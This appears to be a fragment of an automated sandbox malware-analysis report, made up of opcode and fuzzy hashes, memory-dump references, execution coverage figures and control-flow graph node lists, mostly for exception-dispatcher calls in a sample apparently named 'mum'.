                                      • Opcode ID: efbaf3f85fb9594b7d96e12e3b9d67e2fa768329bbaf900a6c80d8575bdcc5ac
                                      • Instruction ID: 8b6d81579892d09348862beba5183d12f92208afa65a4cd8dfda6c14388ebf9d
                                      • Opcode Fuzzy Hash: efbaf3f85fb9594b7d96e12e3b9d67e2fa768329bbaf900a6c80d8575bdcc5ac
                                      • Instruction Fuzzy Hash: 96811574E05258DFDB94CFA9C8807EEBBB2EF89300F1094AAD10AAB350D7745A85CF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 546551049a5d533916b3220e140cb73fef70708e144066a8c0be702949fbcf1f
                                      • Instruction ID: 91af8187c2201fdb61e76c3d5a9ee00fa1fd0575da48a333edf1122f1aaeb095
                                      • Opcode Fuzzy Hash: 546551049a5d533916b3220e140cb73fef70708e144066a8c0be702949fbcf1f
                                      • Instruction Fuzzy Hash: C711AA71E14B189BEB18CF6B8C0079AFAF7AFC9300F04C1AAD509A6254EB7019858F51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:19.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:58%
                                      Total number of Nodes:231
                                      Total number of Limit Nodes:16
                                      execution_graph 9994 2c1548 9995 2c1564 9994->9995 10093 2c2620 9995->10093 9996 2c1599 10097 2c4758 9996->10097 10000 2c15d1 10117 2cce88 10000->10117 10005 2c15f4 10140 2ce440 10005->10140 10012 2c1625 10172 3e04a0 10012->10172 10176 3e0490 10012->10176 10013 2c162c 10180 3e08f8 10013->10180 10184 3e08e8 10013->10184 10014 2c1633 10188 3e0d50 10014->10188 10192 3e0d41 10014->10192 10015 2c163a 10196 3e1198 10015->10196 10200 3e11a8 10015->10200 10016 2c1641 10204 3e1600 10016->10204 10208 3e15f1 10016->10208 10017 2c1648 10212 3e1a58 10017->10212 10216 3e1a4c 10017->10216 10018 2c164f 10220 3e5258 10018->10220 10020 2c168a 10232 3e5b30 10020->10232 10236 3e5b20 10020->10236 10021 2c1691 10240 3e5f78 10021->10240 10244 3e5f88 10021->10244 10022 2c1698 10248 3e63e0 10022->10248 10252 3e63d1 10022->10252 10023 2c169f 10256 3e6838 10023->10256 10260 3e6828 10023->10260 10024 2c16a6 10264 3e6c80 10024->10264 10268 3e6c90 10024->10268 10025 2c16ad 10272 3e7102 10025->10272 10276 3e7110 10025->10276 10026 2c16bb 10280 3e7568 10026->10280 10284 3e7558 10026->10284 10027 2c16c2 10288 3e79c0 10027->10288 10292 3e79b1 10027->10292 10028 2c16c9 10296 3e7e18 10028->10296 10300 3e7e09 10028->10300 10029 2c16d0 10304 3e8260 10029->10304 10308 3e8270 10029->10308 10030 2c16d7 10312 3e86c8 10030->10312 10316 3e86b8 10030->10316 10031 2c16de 10320 3e8b10 10031->10320 10324 3e8b20 10031->10324 10032 2c16e5 10328 3e8f78 10032->10328 10332 3e8f69 10032->10332 10033 2c16ec 10094 2c2634 KiUserExceptionDispatcher 10093->10094 10096 2c270e 10094->10096 10096->9996 10099 2c478a 10097->10099 10098 2c15bc 10102 2cc17f 10098->10102 10099->10098 10336 2cbbf8 10099->10336 10340 2cbd93 10099->10340 10105 2cc187 10102->10105 10103 2c15c3 10106 2cc5dc 10103->10106 10104 2cbbf8 KiUserExceptionDispatcher 10104->10105 10105->10103 10105->10104 10109 2cc5e3 10106->10109 10107 2c15ca 10110 2cca30 10107->10110 10108 2cbbf8 KiUserExceptionDispatcher 10108->10109 10109->10107 10109->10108 10115 2cc704 10110->10115 10116 2cca3a 10110->10116 10111 2cc9e9 10111->10000 10112 2cbbf8 KiUserExceptionDispatcher 10112->10115 10113 2cce41 10113->10000 10114 2cbbf8 KiUserExceptionDispatcher 10114->10116 10115->10111 10115->10112 10116->10113 10116->10114 10120 2cceba 10117->10120 10118 2c15d8 10121 2cd2e0 10118->10121 10119 2cbbf8 KiUserExceptionDispatcher 10119->10120 10120->10118 10120->10119 10124 2cd312 10121->10124 10122 2c15df 10125 2cd738 10122->10125 10123 2cbbf8 KiUserExceptionDispatcher 10123->10124 10124->10122 10124->10123 10128 2cd76a 10125->10128 10126 2c15e6 10129 2cdb90 10126->10129 10127 2cbbf8 KiUserExceptionDispatcher 10127->10128 10128->10126 10128->10127 10132 2cdbc2 10129->10132 10130 2c15ed 10133 2cdfe8 10130->10133 10131 2cbbf8 KiUserExceptionDispatcher 10131->10132 10132->10130 10132->10131 10138 2cdcbc 10133->10138 10139 2cdff2 10133->10139 10134 2cdfa1 10134->10005 10135 2cbbf8 KiUserExceptionDispatcher 10135->10138 10136 2ce3f9 10136->10005 10137 2cbbf8 KiUserExceptionDispatcher 10137->10139 10138->10134 10138->10135 10139->10136 10139->10137 10141 2ce472 10140->10141 10142 2c15fb 10141->10142 10143 2cbbf8 KiUserExceptionDispatcher 10141->10143 10144 2ce89c 10142->10144 10143->10141 10147 2ce8ca 10144->10147 10145 2c1602 10148 2cecf0 10145->10148 10146 2cbbf8 KiUserExceptionDispatcher 10146->10147 10147->10145 10147->10146 10149 2ced22 10148->10149 10150 2c1609 10149->10150 10151 2cbbf8 KiUserExceptionDispatcher 10149->10151 10152 2cf148 10150->10152 10151->10149 10153 2cf17a 10152->10153 10154 2c1610 10153->10154 10155 2cbbf8 KiUserExceptionDispatcher 10153->10155 10156 2cf5a4 10154->10156 10155->10153 10157 2cf5d2 10156->10157 10158 2c1617 10157->10158 10159 2cbbf8 KiUserExceptionDispatcher 10157->10159 10160 2cf9fb 10158->10160 10159->10157 10163 2cfa0c 10160->10163 10161 2c161e 10164 3e0012 10161->10164 10168 3e0048 10161->10168 10162 2cbbf8 KiUserExceptionDispatcher 10162->10163 10163->10161 10163->10162 10165 3e004c KiUserExceptionDispatcher 10164->10165 10167 3e0124 10165->10167 10167->10012 10169 3e006a KiUserExceptionDispatcher 10168->10169 10171 3e0124 10169->10171 10171->10012 10173 3e04c2 KiUserExceptionDispatcher 10172->10173 10175 3e057c 10173->10175 10175->10013 10177 3e04c2 KiUserExceptionDispatcher 10176->10177 10179 3e057c 10177->10179 10179->10013 10181 3e091a KiUserExceptionDispatcher 10180->10181 10183 3e09d4 10181->10183 10183->10014 10185 3e091a KiUserExceptionDispatcher 10184->10185 10187 3e09d4 10185->10187 10187->10014 10189 3e0d72 KiUserExceptionDispatcher 10188->10189 10191 3e0e2c 10189->10191 10191->10015 10193 3e0d54 KiUserExceptionDispatcher 10192->10193 10195 3e0e2c 10193->10195 10195->10015 10197 3e11ca KiUserExceptionDispatcher 10196->10197 10199 3e1284 10197->10199 10199->10016 10201 3e11ca KiUserExceptionDispatcher 10200->10201 10203 3e1284 10201->10203 10203->10016 10205 3e1622 KiUserExceptionDispatcher 10204->10205 10207 3e16dc 10205->10207 10207->10017 10209 3e15fd KiUserExceptionDispatcher 10208->10209 10211 3e16dc 10209->10211 10211->10017 10213 3e1a7a KiUserExceptionDispatcher 10212->10213 10215 3e1b34 10213->10215 10215->10018 10217 3e1a5c KiUserExceptionDispatcher 10216->10217 10219 3e1b34 10217->10219 10219->10018 10221 3e527a KiUserExceptionDispatcher 10220->10221 10223 2c167c 10221->10223 10224 3e56d8 10223->10224 10228 3e56d0 10223->10228 10225 3e56fa KiUserExceptionDispatcher 10224->10225 10227 3e57b4 10225->10227 10227->10020 10229 3e56fa KiUserExceptionDispatcher 10228->10229 10231 3e57b4 10229->10231 10231->10020 10233 3e5b52 KiUserExceptionDispatcher 10232->10233 10235 3e5c0c 10233->10235 10235->10021 10237 3e5b52 KiUserExceptionDispatcher 10236->10237 10239 3e5c0c 10237->10239 10239->10021 10241 3e5f85 KiUserExceptionDispatcher 10240->10241 10243 3e6064 10241->10243 10243->10022 10245 3e5faa KiUserExceptionDispatcher 10244->10245 10247 3e6064 10245->10247 10247->10022 10249 3e6402 KiUserExceptionDispatcher 10248->10249 10251 3e64bc 10249->10251 10251->10023 10253 3e6402 KiUserExceptionDispatcher 10252->10253 10255 3e64bc 10253->10255 10255->10023 10257 3e685a KiUserExceptionDispatcher 10256->10257 10259 3e6914 10257->10259 10259->10024 10261 3e685a KiUserExceptionDispatcher 10260->10261 10263 3e6914 10261->10263 10263->10024 10265 3e6cb2 KiUserExceptionDispatcher 10264->10265 10267 3e6d6c 10265->10267 10267->10025 10269 3e6cb2 KiUserExceptionDispatcher 10268->10269 10271 3e6d6c 10269->10271 10271->10025 10273 3e7132 KiUserExceptionDispatcher 10272->10273 10275 3e71ed 10273->10275 10275->10026 10277 3e7132 KiUserExceptionDispatcher 10276->10277 10279 3e71ed 10277->10279 10279->10026 10281 3e758a KiUserExceptionDispatcher 10280->10281 10283 3e7644 10281->10283 10283->10027 10285 3e758a KiUserExceptionDispatcher 10284->10285 10287 3e7644 10285->10287 10287->10027 10289 3e79e2 KiUserExceptionDispatcher 10288->10289 10291 3e7a9c 10289->10291 10291->10028 10293 3e79e2 KiUserExceptionDispatcher 10292->10293 10295 3e7a9c 10293->10295 10295->10028 10297 3e7e3a KiUserExceptionDispatcher 10296->10297 10299 3e7ef4 10297->10299 10299->10029 10301 3e7e3a KiUserExceptionDispatcher 10300->10301 10303 3e7ef4 10301->10303 10303->10029 10305 3e8292 KiUserExceptionDispatcher 10304->10305 10307 3e834c 10305->10307 10307->10030 10309 3e8292 KiUserExceptionDispatcher 10308->10309 10311 3e834c 10309->10311 10311->10030 10313 3e86ea KiUserExceptionDispatcher 10312->10313 10315 3e87a4 10313->10315 10315->10031 10317 3e86ea KiUserExceptionDispatcher 10316->10317 10319 3e87a4 10317->10319 10319->10031 10321 3e8b24 KiUserExceptionDispatcher 10320->10321 10323 3e8bfc 10321->10323 10323->10032 10325 3e8b42 KiUserExceptionDispatcher 10324->10325 10327 3e8bfc 10325->10327 10327->10032 10329 3e8f9a KiUserExceptionDispatcher 10328->10329 10331 3e9054 10329->10331 10331->10033 10333 3e8f7c KiUserExceptionDispatcher 10332->10333 10335 3e9054 10333->10335 10335->10033 10339 2cbc1f 10336->10339 10337 2cbd4a KiUserExceptionDispatcher 10338 2cbd3b 10337->10338 10338->10099 10339->10337 10339->10338 10342 2cbc57 10340->10342 10341 2cbd4a KiUserExceptionDispatcher 10343 2cbd3b 10341->10343 10342->10341 10342->10343 10343->10099
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K$Rh0$Rh0
                                      • API String ID: 0-4255857475
                                      • Opcode ID: e81d4eb774f6d1969a111b0b5009de07ca3752c0524fd2a6ae3eac064a5539d4
                                      • Instruction ID: e14e2bbfe60538e5992bd8f7b4f30e238a97d7b3b410d908b3b638a253b555bd
                                      • Opcode Fuzzy Hash: e81d4eb774f6d1969a111b0b5009de07ca3752c0524fd2a6ae3eac064a5539d4
                                      • Instruction Fuzzy Hash: 3D33E230C246198ECB11EF68C894AEDF7B1FF99304F55869AD54C67221EB70AAD4CF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 972 2c2620-2c2650 974 2c2657-2c271c KiUserExceptionDispatcher 972->974 975 2c2652 972->975 981 2c2a3a-2c2a6c 974->981 982 2c2722-2c273a 974->982 975->974 985 2c273c 982->985 986 2c2741-2c274a 982->986 985->986 987 2c2a2d-2c2a33 986->987 988 2c274f-2c27c9 987->988 989 2c2a39 987->989 994 2c27cf-2c283d 988->994 995 2c2885-2c28e0 988->995 989->981 1004 2c283f-2c287f 994->1004 1005 2c2880-2c2883 994->1005 1006 2c28e1-2c292f 995->1006 1004->1005 1005->1006 1011 2c2a18-2c2a23 1006->1011 1012 2c2935-2c2a17 1006->1012 1014 2c2a2a 1011->1014 1015 2c2a25 1011->1015 1012->1011 1014->987 1015->1014
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002C26FC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 6593de20916a840e0c77880a711d154693c603c3763311e08a692b33b9fb29c2
                                      • Instruction ID: b8076f4110966b1e8216756441d32e9a693131c2092b5460609518a3eb1d4ce9
                                      • Opcode Fuzzy Hash: 6593de20916a840e0c77880a711d154693c603c3763311e08a692b33b9fb29c2
                                      • Instruction Fuzzy Hash: ACD1E274E10218CFDB14DFA5D994B9DBBB2BF88304F2481AAD809A7365DB349E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1675 3e6838-3e6858 1676 3e685f-3e690c KiUserExceptionDispatcher 1675->1676 1677 3e685a 1675->1677 1682 3e6914-3e6922 1676->1682 1677->1676 1683 3e6c3a-3e6c6c 1682->1683 1684 3e6928-3e693f 1682->1684 1687 3e6946-3e694f 1684->1687 1688 3e6941 1684->1688 1689 3e6c2d-3e6c33 1687->1689 1688->1687 1690 3e6c39 1689->1690 1691 3e6954-3e69ca 1689->1691 1690->1683 1696 3e6a86-3e6ae0 1691->1696 1697 3e69d0-3e6a3e 1691->1697 1706 3e6ae1-3e6b2f 1696->1706 1707 3e6a40-3e6a80 1697->1707 1708 3e6a81-3e6a84 1697->1708 1713 3e6c18-3e6c23 1706->1713 1714 3e6b35-3e6c17 1706->1714 1707->1708 1708->1706 1716 3e6c2a 1713->1716 1717 3e6c25 1713->1717 1714->1713 1716->1689 1717->1716
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E6903
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e676328c7b6750218e8f4e62ccc7307f38ff3faa1dc3a22c6f15c947da53cc27
                                      • Instruction ID: 9035281b10a8dc5fe3975f6645b4bfdf6ccc05c22d51a54c415343a64d87038d
                                      • Opcode Fuzzy Hash: e676328c7b6750218e8f4e62ccc7307f38ff3faa1dc3a22c6f15c947da53cc27
                                      • Instruction Fuzzy Hash: A7C1D174E00218CFDB14DFA5C995B9DBBB2BF89304F2091AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1513 3e5b30-3e5b50 1514 3e5b57-3e5c04 KiUserExceptionDispatcher 1513->1514 1515 3e5b52 1513->1515 1520 3e5c0c-3e5c1a 1514->1520 1515->1514 1521 3e5f32-3e5f64 1520->1521 1522 3e5c20-3e5c37 1520->1522 1525 3e5c3e-3e5c47 1522->1525 1526 3e5c39 1522->1526 1527 3e5f25-3e5f2b 1525->1527 1526->1525 1528 3e5c4c-3e5cc2 1527->1528 1529 3e5f31 1527->1529 1534 3e5d7e-3e5dd8 1528->1534 1535 3e5cc8-3e5d36 1528->1535 1529->1521 1546 3e5dd9-3e5e27 1534->1546 1544 3e5d38-3e5d78 1535->1544 1545 3e5d79-3e5d7c 1535->1545 1544->1545 1545->1546 1551 3e5e2d-3e5f0f 1546->1551 1552 3e5f10-3e5f1b 1546->1552 1551->1552 1554 3e5f1d 1552->1554 1555 3e5f22 1552->1555 1554->1555 1555->1527
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E5BFB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 959571c165f832fb98712e07fc406d90c6a35699f836af199bdf143290f091e7
                                      • Instruction ID: 692953d766c13418618d552db1d120fd8bd3746178a9868b7449045921fafe4b
                                      • Opcode Fuzzy Hash: 959571c165f832fb98712e07fc406d90c6a35699f836af199bdf143290f091e7
                                      • Instruction Fuzzy Hash: 44C1C274E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E8BEB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ff6b44e851104f5f5ef1962977aabbb6849149ac1acc320ec845fe42e8447c1f
                                      • Instruction ID: d7f05cd76969206c763edeb6a247637b78552203cd4225977774a2a26d936dbb
                                      • Opcode Fuzzy Hash: ff6b44e851104f5f5ef1962977aabbb6849149ac1acc320ec845fe42e8447c1f
                                      • Instruction Fuzzy Hash: F6C1D474E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB395DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E7EE3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 2ab43c727e9dd588782432a77979f54b79f5c5975983ab102cb359d5de36f786
                                      • Instruction ID: 0b9436e8b2ab26caa57ddc280dd644a03c2d49cdb081dd45016f18b2bea31714
                                      • Opcode Fuzzy Hash: 2ab43c727e9dd588782432a77979f54b79f5c5975983ab102cb359d5de36f786
                                      • Instruction Fuzzy Hash: CCC1D374E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E71DC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 1b773b0f883b796f303b43b37ffceba8705e0aa9840eb31fd7e0dd58695856a0
                                      • Instruction ID: f3307e355b85ae6bd4a8d1f22741dd8ffa072f52c9d74d3b76de892bb20c84ac
                                      • Opcode Fuzzy Hash: 1b773b0f883b796f303b43b37ffceba8705e0aa9840eb31fd7e0dd58695856a0
                                      • Instruction Fuzzy Hash: 72C1E574E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1297 3e1600-3e1620 1298 3e1627-3e16d4 KiUserExceptionDispatcher 1297->1298 1299 3e1622 1297->1299 1304 3e16dc-3e16ea 1298->1304 1299->1298 1305 3e1a02-3e1a34 1304->1305 1306 3e16f0-3e1707 1304->1306 1309 3e170e-3e1717 1306->1309 1310 3e1709 1306->1310 1311 3e19f5-3e19fb 1309->1311 1310->1309 1312 3e171c-3e1792 1311->1312 1313 3e1a01 1311->1313 1318 3e184e-3e18a8 1312->1318 1319 3e1798-3e1806 1312->1319 1313->1305 1330 3e18a9-3e18f7 1318->1330 1328 3e1808-3e1848 1319->1328 1329 3e1849-3e184c 1319->1329 1328->1329 1329->1330 1335 3e18fd-3e19df 1330->1335 1336 3e19e0-3e19eb 1330->1336 1335->1336 1337 3e19ed 1336->1337 1338 3e19f2 1336->1338 1337->1338 1338->1311
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E16CB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 006fb4f0f4407b32ed2b43dccefea73f5b9644e483906dc3b5100346ebd8c244
                                      • Instruction ID: 9829c029460af09131d8bb646823dcabf576170ca6df6b079b1404c44f415868
                                      • Opcode Fuzzy Hash: 006fb4f0f4407b32ed2b43dccefea73f5b9644e483906dc3b5100346ebd8c244
                                      • Instruction Fuzzy Hash: 6EC1E274E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E9043
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 1a6f67ff3e62cf144631fb62dd5114a6e85a6370c7c456430d39127567d1d72d
                                      • Instruction ID: 724c078513cf69044d079cd1ad1b6aa8784c520fab0fabe88a6d50bf57f6f0fc
                                      • Opcode Fuzzy Hash: 1a6f67ff3e62cf144631fb62dd5114a6e85a6370c7c456430d39127567d1d72d
                                      • Instruction Fuzzy Hash: 29C1C474E00218CFDB14DFA5C994B9DBBB2BF89305F2091AAD809AB395DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E833B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a72842bc3abfaedc244cf2576415f95dcfd0811405a8dedcb19500242e211e9b
                                      • Instruction ID: 2a3a3f97c4eacc214ab79f65fa1f77149aa2f80113c29b54e8334fb2b6092502
                                      • Opcode Fuzzy Hash: a72842bc3abfaedc244cf2576415f95dcfd0811405a8dedcb19500242e211e9b
                                      • Instruction Fuzzy Hash: 4AC1C474E00218CFDB14DFA5C994B9DBBB2BF89304F2081A9D509AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E7633
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 760dbc2453cdcece27c2e83d90dfd2055a40f9eda7d8ba3aec58870c6485ef7f
                                      • Instruction ID: dc8b12af586040d84dff1a604ade65ba7e6df49c50687fd7a60b6beb10ef0865
                                      • Opcode Fuzzy Hash: 760dbc2453cdcece27c2e83d90dfd2055a40f9eda7d8ba3aec58870c6485ef7f
                                      • Instruction Fuzzy Hash: B6C1D374E04218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB395DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1405 3e5258-3e5278 1406 3e527f-3e5342 KiUserExceptionDispatcher 1405->1406 1407 3e527a 1405->1407 1413 3e565a-3e568c 1406->1413 1414 3e5348-3e535f 1406->1414 1407->1406 1417 3e5366-3e536f 1414->1417 1418 3e5361 1414->1418 1419 3e564d-3e5653 1417->1419 1418->1417 1420 3e5659 1419->1420 1421 3e5374-3e53ea 1419->1421 1420->1413 1426 3e54a6-3e5500 1421->1426 1427 3e53f0-3e545e 1421->1427 1438 3e5501-3e554f 1426->1438 1436 3e5460-3e54a0 1427->1436 1437 3e54a1-3e54a4 1427->1437 1436->1437 1437->1438 1443 3e5638-3e5643 1438->1443 1444 3e5555-3e5637 1438->1444 1445 3e564a 1443->1445 1446 3e5645 1443->1446 1444->1443 1445->1419 1446->1445
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E5323
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 7e8664d86187af1daf54a53e43768a488f54a554c1d2866d391d98091c4b67f1
                                      • Instruction ID: e6c2c8c6508a7e61a228782a173634817e9e6213d57a05b907fc60c43cf3ea91
                                      • Opcode Fuzzy Hash: 7e8664d86187af1daf54a53e43768a488f54a554c1d2866d391d98091c4b67f1
                                      • Instruction Fuzzy Hash: 45C1C374E00218CFDB14DFA5C994B9DBBB2BF89305F2091AAD809AB395DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1351 3e1a58-3e1a78 1352 3e1a7f-3e1b2c KiUserExceptionDispatcher 1351->1352 1353 3e1a7a 1351->1353 1358 3e1b34-3e1b42 1352->1358 1353->1352 1359 3e1e5a-3e1e8c 1358->1359 1360 3e1b48-3e1b5f 1358->1360 1363 3e1b66-3e1b6f 1360->1363 1364 3e1b61 1360->1364 1365 3e1e4d-3e1e53 1363->1365 1364->1363 1366 3e1e59 1365->1366 1367 3e1b74-3e1bea 1365->1367 1366->1359 1372 3e1ca6-3e1d00 1367->1372 1373 3e1bf0-3e1c5e 1367->1373 1384 3e1d01-3e1d4f 1372->1384 1382 3e1c60-3e1ca0 1373->1382 1383 3e1ca1-3e1ca4 1373->1383 1382->1383 1383->1384 1389 3e1e38-3e1e43 1384->1389 1390 3e1d55-3e1e37 1384->1390 1392 3e1e4a 1389->1392 1393 3e1e45 1389->1393 1390->1389 1392->1365 1393->1392
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E1B23
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c177bcf36b4f1fb8af08d9bd1ce9b462f7333a3b60670bb08aa864d9b0b55d6a
                                      • Instruction ID: a30110309f5e7930890a636f3ef2c33d04c4f5eaccf658f0c0e853fd5485a038
                                      • Opcode Fuzzy Hash: c177bcf36b4f1fb8af08d9bd1ce9b462f7333a3b60670bb08aa864d9b0b55d6a
                                      • Instruction Fuzzy Hash: 3CC1E274E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1189 3e0d50-3e0d70 1190 3e0d77-3e0e24 KiUserExceptionDispatcher 1189->1190 1191 3e0d72 1189->1191 1196 3e0e2c-3e0e3a 1190->1196 1191->1190 1197 3e1152-3e1184 1196->1197 1198 3e0e40-3e0e57 1196->1198 1201 3e0e5e-3e0e67 1198->1201 1202 3e0e59 1198->1202 1203 3e1145-3e114b 1201->1203 1202->1201 1204 3e0e6c-3e0ee2 1203->1204 1205 3e1151 1203->1205 1210 3e0f9e-3e0ff8 1204->1210 1211 3e0ee8-3e0f56 1204->1211 1205->1197 1220 3e0ff9-3e1047 1210->1220 1221 3e0f58-3e0f98 1211->1221 1222 3e0f99-3e0f9c 1211->1222 1227 3e104d-3e112f 1220->1227 1228 3e1130-3e113b 1220->1228 1221->1222 1222->1220 1227->1228 1230 3e113d 1228->1230 1231 3e1142 1228->1231 1230->1231 1231->1203
                                      APIs
